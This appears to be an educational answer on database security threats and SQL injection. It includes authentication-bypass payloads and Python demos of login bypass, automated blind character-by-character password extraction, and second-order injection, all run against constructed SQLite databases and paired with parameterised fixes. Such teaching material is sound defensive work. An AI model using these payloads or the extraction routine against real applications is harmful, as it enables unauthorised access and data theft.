Database Security
a) Identify and briefly explain three main threats to database security
b) Give an example of SQL injection where an SQL SELECT statement has been manipulated to bypass authentication
Answer:
I have mentioned all the important threats; learn three of them and have a look at the rest.
A) Database Security Threats:
Excessive privileges
When users (or applications) are granted database privileges that exceed the requirements of their job function, those privileges may be used to gain access to confidential information. The solution to this problem is query-level access control, which restricts privileges to the minimum required operations and data.
Privilege abuse
Users may abuse legitimate data access privileges for unauthorized purposes. The solution is access control policies that govern not only what data is accessible but also how it is accessed. By enforcing policies on time of day, location, application client and volume of data retrieved, it is possible to identify users who are abusing their access privileges.
Unauthorized privilege elevation
Attackers may take advantage of vulnerabilities in the database management software itself to escalate from a low-privileged account to administrative privileges.
Platform vulnerabilities
Vulnerabilities in the underlying operating system may lead to unauthorized data access and corruption. For example, the Blaster worm took advantage of a Windows 2000 vulnerability to take down target servers. Keeping the platform patched is the primary defence; IPS tools are additionally a good way to identify and/or block attacks designed to exploit known database platform vulnerabilities.
SQL injection
SQL injection attacks involve an attacker who takes advantage of vulnerabilities in front-end web applications and stored procedures to send unauthorized database queries, often with elevated privileges. Using SQL injection, attackers could even gain unrestricted access to an entire database.
Denial of service
Denial of service (DoS) may be invoked through many techniques. Common DoS techniques include buffer overflows, data corruption, network flooding and resource consumption.
Malware
Cybercriminals, state-sponsored hackers, and spies use advanced attacks that blend multiple tactics, such as spear phishing emails and malware, to penetrate organizations and steal sensitive data. Unaware that malware has infected their device, legitimate users become a conduit for these groups to reach your networks and sensitive data.
Storage Media Exposure
Backup storage media is often completely unprotected from attack. As a result, numerous security breaches have involved the theft of database backup disks and tapes. Furthermore, failure to audit and monitor the activities of administrators who have low-level access to sensitive information can put your data at risk. Taking the appropriate measures to protect backup copies of sensitive data and monitor your most highly privileged users is not only a data security best practice, but also mandated by many regulations.
Weak authentication
Weak authentication schemes allow attackers to assume the identity of legitimate database users. Specific attack strategies include brute force attacks, social engineering, and so on. Strong password policies or, better, two-factor authentication are a must. For scalability and ease of use, authentication mechanisms should be integrated with the enterprise directory/user management infrastructure.
B)
Types of SQL Injection Attacks with Examples:
SQL injection attacks can be carried out in a number of ways. Attackers may observe a system’s behavior before selecting a particular attack vector/method.
Unsanitized Input
Unsanitized input is the most common form of SQLi: the attacker provides user input that isn't properly sanitized for characters that should be escaped, and/or the input isn't validated to be of the type that is expected (for example, a number).
For example, a website used to pay bills online might request the user’s account number in a web form and then send that to the database to pull up the associated account information. If the web application is building a SQL query string dynamically with the account number the user provided, it might look something like this:
"SELECT * FROM customers WHERE account = '" + userProvidedAccountNumber + "';"
While this works for users who properly enter their account number, it leaves the door open for attackers. For example, if someone decided to provide an account number of ' or '1' = '1, that would result in a query string of:
SELECT * FROM customers WHERE account = '' or '1' = '1';
Because '1' = '1' always evaluates to TRUE, sending this statement to the database returns the data for all customers instead of a single customer. Applied to a login query that checks a username and password in its WHERE clause, the same trick makes the condition true regardless of the password supplied, which is exactly how authentication is bypassed.
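The authentication-bypass case asked for in part (b), as an added example that is not code from the original answer: a Python script using the standard sqlite3 module with a constructed two-row users table, a vulnerable_login that concatenates input into the SELECT, and a safe_login that binds parameters. The table, account names and passwords are made up for the demonstration.

```python
import sqlite3

# Constructed sample data for this demonstration (not from the original
# answer). Passwords are stored in plaintext only to keep the example short;
# a real application stores salted hashes, which does not stop this bypass.
SAMPLE_USERS = [("admin", "s3cret!"), ("alice", "wonderland")]


def make_db():
    """In-memory SQLite database with a two-row users table."""
    con = sqlite3.connect(":memory:")
    con.execute(
        "CREATE TABLE users (id INTEGER PRIMARY KEY, username TEXT, password TEXT)"
    )
    con.executemany(
        "INSERT INTO users (username, password) VALUES (?, ?)", SAMPLE_USERS
    )
    return con


def vulnerable_login(con, username, password):
    """Builds the SELECT by string concatenation, the pattern shown above.

    Returns the matched username, or None when no row matches. Because the
    input becomes part of the SQL text, a quote in it ends the string literal
    and whatever follows is parsed as SQL.
    """
    sql = (
        "SELECT username FROM users WHERE username = '" + username
        + "' AND password = '" + password + "';"
    )
    row = con.execute(sql).fetchone()
    return row[0] if row else None


def safe_login(con, username, password):
    """Same check with bound parameters: the driver passes the values
    separately from the statement text, so quotes and comment markers in
    the input remain plain data and can only ever match a literal value."""
    row = con.execute(
        "SELECT username FROM users WHERE username = ? AND password = ?",
        (username, password),
    ).fetchone()
    return row[0] if row else None


if __name__ == "__main__":
    con = make_db()
    # Payload 1: comment out the password check entirely.
    #   ... WHERE username = 'admin'--' AND password = 'wrong';
    print(vulnerable_login(con, "admin'--", "wrong"))        # admin
    # Payload 2: no valid username needed; the OR makes the WHERE clause true
    # for every row, and the first row (admin) is returned.
    #   ... WHERE username = 'nobody' AND password = '' OR '1'='1';
    print(vulnerable_login(con, "nobody", "' OR '1'='1"))    # admin
    # The parameterised version rejects both payloads.
    print(safe_login(con, "admin'--", "wrong"))              # None
    print(safe_login(con, "nobody", "' OR '1'='1"))          # None
```

The second payload shows why the fix has to be parameterisation rather than hiding usernames: AND binds tighter than OR, so the injected OR '1'='1' applies to the whole row filter and the database simply hands back the first account it finds.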
Blind SQL Injection
Also referred to as Inferential SQL Injection, a Blind SQL injection attack doesn’t reveal data directly from the database being targeted. Rather, the attacker closely examines indirect clues in behavior. Details within HTTP responses, blank web pages for certain user input, and how long it takes the database to respond to certain user input are all things that can be clues depending on the goal of the attacker. They could also point to another SQLi attack avenue for the attacker to try.
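How a boolean-based blind attack recovers data from nothing but a "page shown / blank page" signal, as an added example not taken from the original answer. It uses Python's sqlite3 with a constructed shop database, a hypothetical vulnerable endpoint item_page_shown that leaks only whether a row matched, and assumes the attacker already knows the users table and its column names.

```python
import sqlite3


def make_shop_db():
    """Constructed sample database (not from the original answer): a public
    items table behind the vulnerable endpoint and a users table whose
    contents the attacker wants to read."""
    con = sqlite3.connect(":memory:")
    con.execute("CREATE TABLE items (id INTEGER, name TEXT)")
    con.execute("INSERT INTO items VALUES (1, 'widget')")
    con.execute("CREATE TABLE users (username TEXT, password TEXT)")
    con.execute("INSERT INTO users VALUES ('admin', 'Zq7!pass')")
    return con


def item_page_shown(con, item_id):
    """Hypothetical vulnerable endpoint. It concatenates the id into the query
    and the caller learns only whether a row came back (item page rendered or
    a blank page), never the query result itself."""
    sql = "SELECT name FROM items WHERE id = " + item_id
    return con.execute(sql).fetchone() is not None


def ask(con, condition, counter):
    """One yes/no question: append the condition to a predicate known to be
    true, so the page shows the item exactly when the condition holds."""
    counter[0] += 1
    return item_page_shown(con, "1 AND (" + condition + ")")


def extract_secret(con, subquery, max_len=64):
    """Recover the single string that `subquery` returns, one character at a
    time, by binary search over each character's code point (ASCII assumed).
    Returns (recovered string, number of requests made)."""
    counter = [0]
    result = ""
    for pos in range(1, max_len + 1):
        # unicode(substr(...)) is NULL past the end of the string and every
        # comparison with NULL is false, so check the length explicitly.
        if not ask(con, f"length(({subquery})) >= {pos}", counter):
            break
        lo, hi = 0, 127
        while lo < hi:  # invariant: the code point lies in [lo, hi]
            mid = (lo + hi) // 2
            if ask(con, f"unicode(substr(({subquery}), {pos}, 1)) > {mid}", counter):
                lo = mid + 1
            else:
                hi = mid
        result += chr(lo)
    return result, counter[0]


if __name__ == "__main__":
    con = make_shop_db()
    secret, requests = extract_secret(
        con, "SELECT password FROM users WHERE username = 'admin'"
    )
    print(secret, requests)  # Zq7!pass 65
```

Each character costs seven requests for the binary search plus one length check, so an eight-character value takes 65 requests; a detection rule that flags many near-identical requests to one endpoint differing only in a numeric comparison catches exactly this pattern.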
Out-of-Band Injection
This attack is a bit more complex and may be used by an attacker when they cannot achieve their goal in a single, direct query-response attack. Typically, the attacker crafts SQL statements which, when presented to the database, cause the database system to open a connection (for example a DNS lookup or an HTTP request) to an external server the attacker controls. In this fashion the attacker can exfiltrate data over that side channel or potentially influence the behavior of the database.
A Second-Order Injection is often discussed alongside these, but it is a separate category defined by timing rather than by channel: the attacker supplies input that is stored safely at first and is only later read back and used unsafely in a different query. The payload executes when that secondary behavior occurs (a scheduled job, an administrative report, or another user's normal use of the application); if the stored payload happens to be an out-of-band one, that is when the "reach out" to the attacker's system happens.
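A second-order injection, as an added example that is not code from the original answer: Python with sqlite3, a constructed users table, and hypothetical register and change-password functions. Registration binds its parameters correctly, so the malicious username is stored as harmless data; the later password change trusts the stored value and concatenates it, which is where it executes.

```python
import sqlite3


def make_account_db():
    """Constructed sample database (not from the original answer)."""
    con = sqlite3.connect(":memory:")
    con.execute(
        "CREATE TABLE users (id INTEGER PRIMARY KEY, username TEXT, password TEXT)"
    )
    con.execute("INSERT INTO users (username, password) VALUES ('admin', 'original')")
    return con


def register(con, username, password):
    """Registration is written correctly: parameter binding stores the
    attacker's username exactly as typed, quote and all, as inert data.
    Returns the new row's id."""
    cur = con.execute(
        "INSERT INTO users (username, password) VALUES (?, ?)", (username, password)
    )
    return cur.lastrowid


def change_password_vulnerable(con, user_id, new_password):
    """Second-order flaw: the username is read back from the database,
    treated as trusted because 'it is already in the database', and
    concatenated into a new statement. Only that concatenation is unsafe;
    the new password itself is bound as a parameter."""
    (username,) = con.execute(
        "SELECT username FROM users WHERE id = ?", (user_id,)
    ).fetchone()
    sql = "UPDATE users SET password = ? WHERE username = '" + username + "'"
    con.execute(sql, (new_password,))


def change_password_safe(con, user_id, new_password):
    """Fix: never rebuild SQL text from stored values; key the update on the
    id and bind everything."""
    con.execute(
        "UPDATE users SET password = ? WHERE id = ?", (new_password, user_id)
    )


def password_of(con, username):
    row = con.execute(
        "SELECT password FROM users WHERE username = ?", (username,)
    ).fetchone()
    return row[0] if row else None


if __name__ == "__main__":
    con = make_account_db()
    # Stored harmlessly now; executed later.
    uid = register(con, "admin'--", "attacker")
    # The later UPDATE becomes:
    #   UPDATE users SET password = ? WHERE username = 'admin'--'
    # so the attacker's password change lands on the admin account.
    change_password_vulnerable(con, uid, "pwned")
    print(password_of(con, "admin"))     # pwned
    print(password_of(con, "admin'--"))  # attacker
```

The lesson is that "came from the database" is not a trust boundary: every value that is spliced into SQL text must be bound, whether it arrived in the request a moment ago or was written by a different code path weeks earlier.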